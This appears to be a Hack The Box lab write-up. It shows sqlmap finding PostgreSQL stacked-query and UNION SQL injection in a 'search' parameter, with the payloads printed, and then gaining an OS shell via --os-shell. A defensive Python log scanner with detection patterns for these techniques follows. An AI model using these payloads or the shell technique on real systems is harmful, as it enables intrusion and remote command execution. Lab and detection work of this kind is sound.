CMD INJECTION
#Identify vulnerable SQLi entry points
root@htb:~$ which sqlmap
/usr/bin/sqlmap
root@htb:~$ sqlmap -hh
...
Usage: python3 sqlmap [options]
...
root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies >
PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu
* the cookie is required for authentication
- this implies that the logged-in user has elevated privileges (admin)
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu"
...
[13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]
[13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:50:32] [WARNING] reflective value(s) found and filtering out
[13:50:32] [INFO] target URL appears to have 5 columns in query
[13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: search (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=null';SELECT PG_SLEEP(5)--
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
---
[13:50:34] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174'
[*] ending @ 13:50:34 /2025-04-17/
#exploit the vulnerability w/ sqlmap's --os-shell flag (OS command execution through the DBMS)
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=i333q3ar3rlq5ms4sg4h6895sa" --os-shell
[13:59:00] [INFO] resuming back-end DBMS 'postgresql'
[13:59:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=null';SELECT PG_SLEEP(5)--
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
---
[13:59:00] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:59:00] [INFO] fingerprinting the back-end DBMS operating system
[13:59:00] [INFO] the back-end DBMS operating system is Linux
[13:59:00] [INFO] testing if current user is DBA
[13:59:00] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[13:59:00] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
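Defender-side view of the session above, as an added example that is not part of the original note: a small scanner that URL-decodes request parameters from Apache access-log lines and flags the sqlmap techniques seen on this page (PG_SLEEP stacked query, UNION NULL column probing, CHR()||CHR() string building, and the COPY ... FROM PROGRAM step behind --os-shell). The log lines, client IPs, timestamps and the COPY target name are constructed placeholders, not values from the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines mirroring the probes on this page
# (client IPs, timestamps and the COPY target are placeholders, not page values).
SAMPLE_LOG = """\
10.10.14.5 - - [17/Apr/2025:13:50:27 +0000] "GET /dashboard.php?search=null HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [17/Apr/2025:13:50:27 +0000] "GET /dashboard.php?search=null%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 5120 "-" "sqlmap/1.9"
10.10.14.5 - - [17/Apr/2025:13:50:32 +0000] "GET /dashboard.php?search=null%27%20UNION%20ALL%20SELECT%20NULL%2C%28CHR%28113%29%7C%7CCHR%28106%29%29%2CNULL%2CNULL%2CNULL--%20neMF HTTP/1.1" 200 6010 "-" "sqlmap/1.9"
10.10.14.5 - - [17/Apr/2025:13:59:00 +0000] "GET /dashboard.php?search=null%27%3BCOPY%20t%20FROM%20PROGRAM%20%27...%27-- HTTP/1.1" 200 5120 "-" "sqlmap/1.9"
10.10.14.9 - - [17/Apr/2025:14:01:11 +0000] "GET /dashboard.php?search=laptop HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
"""

# client, timestamp, method, path, status, user agent (combined log format)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# One rule per technique sqlmap used above: time-based stacked query (PG_SLEEP),
# UNION column-count probing with NULLs, CHR()||CHR() string building, and the
# COPY ... FROM PROGRAM statement behind --os-shell.
RULES = {
    "stacked_pg_sleep":  re.compile(r";\s*SELECT\s+PG_SLEEP\s*\(", re.I),
    "union_null_probe":  re.compile(r"\bUNION\s+(ALL\s+)?SELECT\s+NULL\b", re.I),
    "chr_concat":        re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|\s*CHR\s*\(", re.I),
    "copy_from_program": re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I),
}

def scan_line(line):
    """Return a finding for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, ts, method, path, status, ua = m.groups()
    hits = set()
    # parse_qsl URL-decodes each value, so the rules see what the DB driver saw
    for _name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    if "sqlmap" in ua.lower():  # default UA; trivially changed, so payload rules matter more
        hits.add("sqlmap_user_agent")
    if not hits:
        return None
    return {"client": client, "time": ts, "path": urlsplit(path).path, "rules": sorted(hits)}

def scan_log(text):
    """Scan a whole log and return findings in file order."""
    return [f for f in map(scan_line, text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A COPY ... FROM PROGRAM hit is worth escalating: it only succeeds when the web application's database role is a superuser (or holds pg_execute_server_program on PostgreSQL 11+), so the finding also points at an over-privileged DB account to fix.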